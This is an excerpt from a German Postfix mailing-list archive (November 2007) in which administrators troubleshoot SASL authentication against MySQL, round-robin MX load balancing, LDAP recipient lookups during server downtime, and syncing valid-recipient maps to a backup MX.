ebenfalls: > > mysql> select password from sasl where username='test1 at test.de'; Was passiert, wenn du folgendes machst: select password from sasl where username='test1'; -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From Ralf.Hildebrandt at charite.de Wed Nov 28 22:25:44 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 28 Nov 2007 22:25:44 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <474DBA28.2090301@japantest.homelinux.com> References: <474D177C.7070305@thomas-schwenski.de> <20071128081857.GB8464@charite.de> <474DBA28.2090301@japantest.homelinux.com> Message-ID: <20071128212544.GF525@charite.de> * Sandy Drobic : > Du hattest das Ergebnis der Diskussion dann auf deiner Seite gepostet. > Hier zur Erinnerung: (^-^) > > http://www.arschkrebs.de/postfix/postfix_memory.shtml Oh shit :) -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Yes, and every single administrator that's configured their virus scanner to bounce to envelope deserves a swift kick upside the head. From lists at puersten.de Wed Nov 28 22:53:23 2007 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Wed, 28 Nov 2007 22:53:23 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <20071128192511.GC27397@state-of-mind.de> References: <474DBD57.5000203@puersten.de> <20071128192511.GC27397@state-of-mind.de> Message-ID: <474DE353.9020007@puersten.de> Patrick Ben Koetter schrieb: > * Oliver Pürsten : >> Hallo Leute, >> >> ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das >> Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles >> probiert, es will aber einfach nicht. >> >> Vielleicht fällt Euch ja noch was ein. >> >> Folgende Hintergrundinfo's: >> >> Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und >> password enthält, hier die zur Authentifizierung genutzte smtpd.conf: >> >> pwcheck_method: auxprop >> auxprop_plugin: sql >> mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 >> sql_engine: mysql >> sql_hostnames: 127.0.0.1 >> sql_user: mail >> sql_passwd: mail >> sql_database: mail >> sql_select: SELECT password FROM sasl WHERE username = '%u' >> >> Ich teste mit den SASL Tools client und server, was folgendes Ergebnis bei einer >> Probesession bringt: > > Hast Du dafür eine sample.conf angelegt? Wenn ja, wo liegt die? > > p at rick hätte ich erwähnen sollen, ich habe auf die eigentliche smtpd.conf im lib directory per symlink verwiesen und diesen dann sample.conf genannt. aus dem verzeichnis mit dem symlink starte ich dann auch den server und den client. (ist das quellcode verzeichnis) regards - oliver > > > > >> >> #./client -s rcmd -p 8000 -m PLAIN 127.0.0.1 >> receiving capability list... recv: {57} >> NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 >> NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 >> please enter an authentication id: test1 at test.de >> please enter an authorization id: test1 at test.de >> Password: >> send: {5} >> PLAIN >> send: {1} >> Y >> send: {32} >> test1 at test.de[0]test1 at test.de[0]test >> authentication failed >> closing connection >> >> #./server -s rcmd -p 8000 >> trying 28, 1, 6 >> trying 2, 1, 6 >> accepted new connection >> send: {57} >> NTLM LOGIN ANONYMOUS PLAIN GSSAPI OTP DIGEST-MD5 CRAM-MD5 >> recv: {5} >> PLAIN >> recv: {1} >> Y >> recv: {32} >> test1 at test.de[0]test1 at test.de[0]test >> starting SASL negotiation: user not foundclosing connection >> >> Direkter sql in der Datenbank funktioniert ebenfalls: >> >> mysql> select password from sasl where username='test1 at test.de'; >> +----------+ >> | password | >> +----------+ >> | test | >> +----------+ >> 1 row in set (0.00 sec) >> >> mysql> >> >> >> Besten Dank ! >> >> Gruß Oliver >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listi.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > From lists at puersten.de Wed Nov 28 22:59:49 2007 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Wed, 28 Nov 2007 22:59:49 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474DC7E4.8060300@japantest.homelinux.com> References: <474DBD57.5000203@puersten.de> <474DC7E4.8060300@japantest.homelinux.com> Message-ID: <474DE4D5.9010907@puersten.de> Sandy Drobic schrieb: > Oliver Pürsten wrote: >> Hallo Leute, >> >> ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das >> Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles >> probiert, es will aber einfach nicht. >> >> Vielleicht fällt Euch ja noch was ein. >> >> Folgende Hintergrundinfo's: >> >> Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und >> password enthält, hier die zur Authentifizierung genutzte smtpd.conf: >> >> pwcheck_method: auxprop >> auxprop_plugin: sql >> mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 >> sql_engine: mysql >> sql_hostnames: 127.0.0.1 >> sql_user: mail >> sql_passwd: mail >> sql_database: mail >> sql_select: SELECT password FROM sasl WHERE username = '%u' > > %u ist nur der username bzw. der localpart. Wenn du eine komplette > Emailadresse verwenden willst, nimm %s. > Wie sind die Usernamen angelegt? Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der komplette übergebene username. Im meinem Falls ist es so das username = emailadresse ist. Sprich die Tabelle sasl sieht wie folgt aus: mysql> select * from sasl; +---------------+----------+ | username | password | +---------------+----------+ | test1 at test.de | test | +---------------+----------+ > > >> recv: {32} >> test1 at test.de[0]test1 at test.de[0]test >> starting SASL negotiation: user not foundclosing connection >> >> Direkter sql in der Datenbank funktioniert ebenfalls: >> >> mysql> select password from sasl where username='test1 at test.de'; > > Was passiert, wenn du folgendes machst: > > select password from sasl where username='test1'; > wird nicht funktionieren, s.o. regards - oliver > From postfixbuch-users at japantest.homelinux.com Wed Nov 28 23:04:58 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 28 Nov 2007 23:04:58 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474DE4D5.9010907@puersten.de> References: <474DBD57.5000203@puersten.de> <474DC7E4.8060300@japantest.homelinux.com> <474DE4D5.9010907@puersten.de> Message-ID: <474DE60A.6030301@japantest.homelinux.com> Oliver Pürsten wrote: > Sandy Drobic schrieb: >> Oliver Pürsten wrote: >>> Hallo Leute, >>> >>> ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das >>> Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles >>> probiert, es will aber einfach nicht. >>> >>> Vielleicht fällt Euch ja noch was ein. >>> >>> Folgende Hintergrundinfo's: >>> >>> Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und >>> password enthält, hier die zur Authentifizierung genutzte smtpd.conf: >>> >>> pwcheck_method: auxprop >>> auxprop_plugin: sql >>> mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 >>> sql_engine: mysql >>> sql_hostnames: 127.0.0.1 >>> sql_user: mail >>> sql_passwd: mail >>> sql_database: mail >>> sql_select: SELECT password FROM sasl WHERE username = '%u' >> %u ist nur der username bzw. der localpart. Wenn du eine komplette >> Emailadresse verwenden willst, nimm %s. >> Wie sind die Usernamen angelegt? > > Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der komplette übergebene > username. Im meinem Falls ist es so das username = emailadresse ist. > Sprich die Tabelle sasl sieht wie folgt aus: > > mysql> select * from sasl; > +---------------+----------+ > | username | password | > +---------------+----------+ > | test1 at test.de | test | > +---------------+----------+ Okay, dann passe die sql_select entsprechend an in smtpd.conf: sql_select: SELECT password FROM sasl WHERE username = '%s' -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From nospam at thoma.cc Thu Nov 29 06:36:28 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Thu, 29 Nov 2007 06:36:28 +0100 Subject: [Postfixbuch-users] Postfix Loadbalancing und Backup Message-ID: <474E4FDC.2030805@thoma.cc> Hallo Liste, ich habe vor mit 4 Servern ein "Loadbalancing/Backup" einzurichten. Ziel dabei soll sein die Last und die User auf diese 4 Server zu verteilen. Dabei soll jeweils die anderen 3 den Backup für einen machen. Das verteilen der Last möchte ich per DNS realisieren das funktioniert auch im LAB sehr gut. mxlb.example.de -> A 10.4.4.1, A 10.4.4.2, A 10.4.4.3, A 10.4.4.4 mx01.example.de -> A 10.4.4.1 und jeweils dazu den PTR mx02.example.de -> A 10.4.4.2 und jeweils dazu den PTR mx03.example.de -> A 10.4.4.3 und jeweils dazu den PTR mx04.example.de -> A 10.4.4.4 und jeweils dazu den PTR Bei einer Kundendomain wird dann mxlb.example.de als MX eingetragen. via Round Robin werden dann die Mails auf die Server verteilt. Alle Userdaten sind in MySQL gespeichert. Jeder Host betreibt seinen eigenen POP und IMAP server. per Perdition werden dann unter einer Adresse (imap.example.de und pop3.example.de) zur Verfügung gestellt. Es wird anhand einer mysql Tabelle entschieden wohin der Login (imap und pop) "geroutet" wird. Das funktioniert ebenfalls super. Die MySQL Tabellen werden via MySQL Replication auf allen Servern verteilt. Die Domains für die der Server nicht zuständig ist sind in der relay_domains drin und sollen dann an den entsprechenden Server zugestellt werden. Mein Problem ist folgendes: Beispiel: from:x at y.de to:user at example.org domain example.org liegt auf mx02.example.de und wird von mx01.example.de angenommen. mx01.example.de kennt die domain example.org nicht ist aber in relay_domains drin und der mx eintrag von der domain wird aufgelöst um den relay host rauszufinden. wenn jetzt bei der auflösung durch das round robin gerade mx01.example.de als zieladresse aufgelöst wird dann bounced er die nachricht mit loop back to myself und stellt sie nicht dem host mx02.example.de zu. meine idee war dann eine transport map zu schreiben allerdings blieb das leider ohne erfolg. mysql> select * from transport; +----+------------------+------------------------+ | id | domain | destination | +----+------------------+------------------------+ | 1 | example.org | smtp:mx02.example.de | +----+------------------+------------------------+ 1 rows in set (0.00 sec) das ganze hängt dann per transport_maps = mysql:/etc/postfix/mysql-v_transport.cf drin. Der Test ob die Transport Map funktioniert war ebenfalls erfolgreich. root at mx02:/# postmap -q example.org mysql:/etc/postfix/mysql-v_transport.cf smtp:mx02.example.de Leider ignoriert er diese Map vollständig. Was kann ich tun damit es funktioniert bzw. habt ihr eine bessere Idee ? Danke im voraus. Gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From Postfix at TMI-RZ.de Wed Nov 28 11:10:27 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Wed, 28 Nov 2007 11:10:27 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit Message-ID: <474D3E93.7040207@TMI-RZ.de> Hallo zusammen, wir haben folgende Ausgangssituation: Wir betreiben 3 Postfix-Server als SMTP-Relays, die im Internet hängen und schon mal einiges an SPAM vorfiltern. Die Mails werden dann an einen Domino-Server DOM2 (ebenfalls in der DMZ) per SMTP weitergeleitet, auf dem weitere Checks laufen. Wir haben allerdings in der letzten Zeit das Problem, dass wir sehr viele Mails mit falschen Empfänger-Adressen bekommen, die das Domino-System unnötig belasten. Daher wollen wir per LDAP direkt eine Abfrage auf Benutzer im Domino-Directory ausführen und alle Mails abweisen, die nicht an eine gültige Adresse gehen. Ich habe auf dem DOM2 den LDAP-Server konfiguriert und gestartet sowie auf unserem Testsystem mittels relay_recipient_maps ein LDAP-Lookup eingerichtet, das auch wie gewünscht funktioniert. Das Problem ist nun allerdings, dass wir während des Offline-Backups des Domino-Servers temporäre Lookup-Fehler erhalten und die Mails dann temporär abgelehnt werden: 451 : Temporary lookup failure Da sich auf das Testsystem in der Regel nur ein paar wenige SPAM-Mails verirren ist das nicht ganz so tragisch, aber auf den Produktiv-Servern können wir das nicht gebrauchen. Daher bräuchten wir eine Lösung, damit auch in der Zeit wo der DOM2 down ist die Mails weiterhin angenommen und zugestellt werden. Nach einiger Recherche und reiflicher Überlegung bin ich auf 2 mögliche Szenarien gekommen. Variante A: Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup konfigurieren. Wobei sich hier die Frage stellt wie man das am besten konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf DOM1 zugreifen, wenn DOM2 down ist. Variante B: Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld Kurzname aus dem Domino-Directory mit abgefragt werden. Die LDAP-Query für Postfix lautet: query_filter = (|(mail=%s)(uid=%u)(uid=%s)) Die Variante B würde ich ganz klar bevorzugen, da ich hier nicht nur keinen 2. LDAP-Server laufen lassen müsste und den Zugriff aus der DMZ ins Intranet nicht erlauben müsste, sondern vor allem auch die Anzahl der LDAP-Abfragen minimieren könnte - was den Domino-Server zusätzlich entlasten würde. Ich wäre für jeden vernünftigen Vorschlag sehr dankbar. Gruß Tom From lists at puersten.de Thu Nov 29 08:34:55 2007 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Thu, 29 Nov 2007 08:34:55 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474DE60A.6030301@japantest.homelinux.com> References: <474DBD57.5000203@puersten.de> <474DC7E4.8060300@japantest.homelinux.com> <474DE4D5.9010907@puersten.de> <474DE60A.6030301@japantest.homelinux.com> Message-ID: <474E6B9F.8010800@puersten.de> Sandy Drobic schrieb: > Oliver Pürsten wrote: >> Sandy Drobic schrieb: >>> Oliver Pürsten wrote: >>>> Hallo Leute, >>>> >>>> ich versuche eine SASL Authentifizierung gegen eine MySQL Datenbank zu bauen und habe das >>>> Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles >>>> probiert, es will aber einfach nicht. >>>> >>>> Vielleicht fällt Euch ja noch was ein. >>>> >>>> Folgende Hintergrundinfo's: >>>> >>>> Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und >>>> password enthält, hier die zur Authentifizierung genutzte smtpd.conf: >>>> >>>> pwcheck_method: auxprop >>>> auxprop_plugin: sql >>>> mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 >>>> sql_engine: mysql >>>> sql_hostnames: 127.0.0.1 >>>> sql_user: mail >>>> sql_passwd: mail >>>> sql_database: mail >>>> sql_select: SELECT password FROM sasl WHERE username = '%u' >>> %u ist nur der username bzw. der localpart. Wenn du eine komplette >>> Emailadresse verwenden willst, nimm %s. >>> Wie sind die Usernamen angelegt? >> Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der komplette übergebene >> username. Im meinem Falls ist es so das username = emailadresse ist. >> Sprich die Tabelle sasl sieht wie folgt aus: >> >> mysql> select * from sasl; >> +---------------+----------+ >> | username | password | >> +---------------+----------+ >> | test1 at test.de | test | >> +---------------+----------+ > > Okay, dann passe die sql_select entsprechend an in smtpd.conf: > sql_select: SELECT password FROM sasl WHERE username = '%s' Funktioniert auch nicht, produziert genau das gleiche Fehlerbild. Oliver From p at state-of-mind.de Thu Nov 29 08:36:59 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Thu, 29 Nov 2007 08:36:59 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474D3E93.7040207@TMI-RZ.de> References: <474D3E93.7040207@TMI-RZ.de> Message-ID: <20071129073659.GB10093@state-of-mind.de> * Thomas Stiefel : > Variante A: > Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen > LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup > konfigurieren. Wobei sich hier die Frage stellt wie man das am besten > konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide > Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf > DOM1 zugreifen, wenn DOM2 down ist. > > Variante B: > Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script > das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben > kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld > Kurzname aus dem Domino-Directory mit abgefragt werden. Ist das Feld "Kurzname" eine interne Anforderung oder leitet sie sich aus einem Postfix requirement ab? Variante B würde ich definitiv bevorzugen. So kommt auch keine Last auf das Domino System wenn dictionary attacks auf die Postfix Server eingehen. p at rick > > Die LDAP-Query für Postfix lautet: query_filter = > (|(mail=%s)(uid=%u)(uid=%s)) > > Die Variante B würde ich ganz klar bevorzugen, da ich hier nicht nur > keinen 2. LDAP-Server laufen lassen müsste und den Zugriff aus der DMZ > ins Intranet nicht erlauben müsste, sondern vor allem auch die Anzahl > der LDAP-Abfragen minimieren könnte - was den Domino-Server zusätzlich > entlasten würde. > > Ich wäre für jeden vernünftigen Vorschlag sehr dankbar. > > Gruß > Tom > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From p at state-of-mind.de Thu Nov 29 09:00:01 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Thu, 29 Nov 2007 09:00:01 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474E6B9F.8010800@puersten.de> References: <474DBD57.5000203@puersten.de> <474DC7E4.8060300@japantest.homelinux.com> <474DE4D5.9010907@puersten.de> <474DE60A.6030301@japantest.homelinux.com> <474E6B9F.8010800@puersten.de> Message-ID: <20071129080001.GA10665@state-of-mind.de> * Oliver Pürsten : > >>>> Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles > >>>> probiert, es will aber einfach nicht. > >>>> > >>>> Vielleicht fällt Euch ja noch was ein. > >>>> > >>>> Folgende Hintergrundinfo's: > >>>> > >>>> Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und > >>>> password enthält, hier die zur Authentifizierung genutzte smtpd.conf: > >>>> > >>>> pwcheck_method: auxprop > >>>> auxprop_plugin: sql > >>>> mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 > >>>> sql_engine: mysql > >>>> sql_hostnames: 127.0.0.1 > >>>> sql_user: mail > >>>> sql_passwd: mail > >>>> sql_database: mail > >>>> sql_select: SELECT password FROM sasl WHERE username = '%u' Darf der user mail mit passwd mail auf die DB mail zugreifen? Was sagt Dein MySQL-Log, wenn Du mit sample-server authen willst? p at rick > >>> %u ist nur der username bzw. der localpart. Wenn du eine komplette > >>> Emailadresse verwenden willst, nimm %s. > >>> Wie sind die Usernamen angelegt? > >> Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der komplette übergebene > >> username. Im meinem Falls ist es so das username = emailadresse ist. > >> Sprich die Tabelle sasl sieht wie folgt aus: > >> > >> mysql> select * from sasl; > >> +---------------+----------+ > >> | username | password | > >> +---------------+----------+ > >> | test1 at test.de | test | > >> +---------------+----------+ > > > > Okay, dann passe die sql_select entsprechend an in smtpd.conf: > > sql_select: SELECT password FROM sasl WHERE username = '%s' > > Funktioniert auch nicht, produziert genau das gleiche Fehlerbild. > > Oliver > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From lists at puersten.de Thu Nov 29 09:52:50 2007 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Thu, 29 Nov 2007 09:52:50 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <20071129080001.GA10665@state-of-mind.de> References: <474DBD57.5000203@puersten.de> <474DC7E4.8060300@japantest.homelinux.com> <474DE4D5.9010907@puersten.de> <474DE60A.6030301@japantest.homelinux.com> <474E6B9F.8010800@puersten.de> <20071129080001.GA10665@state-of-mind.de> Message-ID: <474E7DE2.2000000@puersten.de> Patrick Ben Koetter schrieb: > * Oliver Pürsten : >>>>>> Problem das die Authentifizierung nicht funktioniert. Ich habe schon so ziehmlich alles >>>>>> probiert, es will aber einfach nicht. >>>>>> >>>>>> Vielleicht fällt Euch ja noch was ein. >>>>>> >>>>>> Folgende Hintergrundinfo's: >>>>>> >>>>>> Ich habe mittlerweile schon eine einfache db Tabelle erstellt welche nur username und >>>>>> password enthält, hier die zur Authentifizierung genutzte smtpd.conf: >>>>>> >>>>>> pwcheck_method: auxprop >>>>>> auxprop_plugin: sql >>>>>> mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 >>>>>> sql_engine: mysql >>>>>> sql_hostnames: 127.0.0.1 >>>>>> sql_user: mail >>>>>> sql_passwd: mail >>>>>> sql_database: mail >>>>>> sql_select: SELECT password FROM sasl WHERE username = '%u' > > > Darf der user mail mit passwd mail auf die DB mail zugreifen? > Was sagt Dein MySQL-Log, wenn Du mit sample-server authen willst? > > p at rick # mysql -umail -pmail -h127.0.0.1 mail Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 16 Server version: 5.0.45-log FreeBSD port: mysql-server-5.0.45 Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> SELECT password FROM sasl WHERE username = 'test1 at test.de'; +----------+ | password | +----------+ | test | +----------+ 1 row in set (0.00 sec) mysql> Bye die idee mit dem mysqld querry log hatte ich noch nicht. interessant ist das da nix ankommt wenn ich die anfrage stelle. Oliver > > > >>>>> %u ist nur der username bzw. der localpart. Wenn du eine komplette >>>>> Emailadresse verwenden willst, nimm %s. >>>>> Wie sind die Usernamen angelegt? >>>> Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der komplette übergebene >>>> username. Im meinem Falls ist es so das username = emailadresse ist. >>>> Sprich die Tabelle sasl sieht wie folgt aus: >>>> >>>> mysql> select * from sasl; >>>> +---------------+----------+ >>>> | username | password | >>>> +---------------+----------+ >>>> | test1 at test.de | test | >>>> +---------------+----------+ >>> Okay, dann passe die sql_select entsprechend an in smtpd.conf: >>> sql_select: SELECT password FROM sasl WHERE username = '%s' >> Funktioniert auch nicht, produziert genau das gleiche Fehlerbild. >> >> Oliver >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listi.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > From Postfix at TMI-RZ.de Thu Nov 29 10:57:55 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Thu, 29 Nov 2007 10:57:55 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX - wie automatisieren? In-Reply-To: <000901c83112$ca0ef790$5e2ce6b0$@com> References: <000901c83112$ca0ef790$5e2ce6b0$@com> Message-ID: <474E8D23.7000609@TMI-RZ.de> Andreas Pothe schrieb: > Servus, > > seit einiger Zeit betreibe ich einen eigenen Backup-MX. Über entsprechend > derzeit manuell geflegte Listen kennt dieser auch die gültigen > Empfängeradressen über Relay-Maps, sodass dieser MX auch nicht zu einem > Backscatter-Versender werden kann. > > Solange man sowas nur für eigene E-Mail-Adressen macht, wo sich zudem > äußerst selten mal eine Änderung ergibt, ist das ja auch praktikabel. Nun > soll der Server, der sich die meiste Zeit ja langweilt :-) auch für Freunde > als Backup-MX herhalten. Und da ist es eben nicht mehr praktikabel, für jede > Adressänderung sich auf eine Konsole zu begeben und manuell die Maps zu > pflegen. > > Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dassder > Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen > Empfangsadressen kennt? > Ich hatte das Problem auch, da wir hier mehrer Postfix-Server mit gleicher Konfiguration betreiben. Daher habe ich irgendwann mal ein Shell-Script gebastelt, das von einem Master-Server, auf dem die Änderungen gepflegt werden, die geänderten Lookup-Tables per Rsync abholt, einen postmap ausführt und Postfix neu lädt. Das ganze funktioniert problemlos und ich kann das Script bei Interesse gerne zur Verfügung stellen. Gruß Tom From postfixbuch-users at japantest.homelinux.com Thu Nov 29 11:29:01 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Thu, 29 Nov 2007 11:29:01 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474D3E93.7040207@TMI-RZ.de> References: <474D3E93.7040207@TMI-RZ.de> Message-ID: <474E946D.1040002@japantest.homelinux.com> Thomas Stiefel wrote: > Hallo zusammen, > > wir haben folgende Ausgangssituation: > Wir betreiben 3 Postfix-Server als SMTP-Relays, die im Internet hängen > und schon mal einiges an SPAM vorfiltern. Die Mails werden dann an einen > Domino-Server DOM2 (ebenfalls in der DMZ) per SMTP weitergeleitet, auf > dem weitere Checks laufen. Wir haben allerdings in der letzten Zeit das > Problem, dass wir sehr viele Mails mit falschen Empfänger-Adressen > bekommen, die das Domino-System unnötig belasten. > > Daher wollen wir per LDAP direkt eine Abfrage auf Benutzer im > Domino-Directory ausführen und alle Mails abweisen, die nicht an eine > gültige Adresse gehen. Ich habe auf dem DOM2 den LDAP-Server > konfiguriert und gestartet sowie auf unserem Testsystem mittels > relay_recipient_maps ein LDAP-Lookup eingerichtet, das auch wie > gewünscht funktioniert. > > Das Problem ist nun allerdings, dass wir während des Offline-Backups des > Domino-Servers temporäre Lookup-Fehler erhalten und die Mails dann > temporär abgelehnt werden: > > 451 : Temporary lookup failure Mit Address_verify_db kann man das etwas abmildern, aber es ist kein vollwertiger Ersatz für eine Liste aller gültigen Empfänger. > Da sich auf das Testsystem in der Regel nur ein paar wenige SPAM-Mails > verirren ist das nicht ganz so tragisch, aber auf den Produktiv-Servern > können wir das nicht gebrauchen. Daher bräuchten wir eine Lösung, damit > auch in der Zeit wo der DOM2 down ist die Mails weiterhin angenommen und > zugestellt werden. Nach einiger Recherche und reiflicher Überlegung bin > ich auf 2 mögliche Szenarien gekommen. > > Variante A: > Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen > LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup > konfigurieren. Wobei sich hier die Frage stellt wie man das am besten > konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide > Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf > DOM1 zugreifen, wenn DOM2 down ist. > > Variante B: > Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script > das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben > kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld > Kurzname aus dem Domino-Directory mit abgefragt werden. > > Die LDAP-Query für Postfix lautet: query_filter = > (|(mail=%s)(uid=%u)(uid=%s)) > > Die Variante B würde ich ganz klar bevorzugen, da ich hier nicht nur > keinen 2. LDAP-Server laufen lassen müsste und den Zugriff aus der DMZ > ins Intranet nicht erlauben müsste, sondern vor allem auch die Anzahl > der LDAP-Abfragen minimieren könnte - was den Domino-Server zusätzlich > entlasten würde. > So hatte ich das auch gelöst. Dem Postfixserver den Zugriff auf LDAP gestatten und per cron ein Script aufrufen, welches die gültigen User und Domains zusammenstellt. Dann kann ich den Server auch mehrere Stunden abschalten, ohne das Mails abgewiesen werden. Zusätzlich werden neue User automatisch übernommen, die Konfiguration der Accounts findet also nur auf dem Dominoserver statt. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From cscholz at 2nibbles4u.de Thu Nov 29 11:29:07 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Thu, 29 Nov 2007 11:29:07 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX -wie automatisieren? In-Reply-To: <474E8D23.7000609@TMI-RZ.de> References: <000901c83112$ca0ef790$5e2ce6b0$@com> <474E8D23.7000609@TMI-RZ.de> Message-ID: <63908DA348933441A6FB2AB998ED894F0196E1@dcex01.2nibbles4u.local> > > Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dassder > > Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen > > Empfangsadressen kennt? > > > Ich hatte das Problem auch, da wir hier mehrer Postfix-Server mit > gleicher Konfiguration betreiben. Daher habe ich irgendwann mal ein > Shell-Script gebastelt, das von einem Master-Server, auf dem die > Änderungen gepflegt werden, die geänderten Lookup-Tables per Rsync > abholt, einen postmap ausführt und Postfix neu lädt. > > Das ganze funktioniert problemlos und ich kann das Script bei Interesse > gerne zur Verfügung stellen. > > Gruß Tom Ich würde mich über das Script freuen ;-) Gruß Christian Scholz From Postfix at TMI-RZ.de Thu Nov 29 10:17:22 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Thu, 29 Nov 2007 10:17:22 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <20071129073659.GB10093@state-of-mind.de> References: 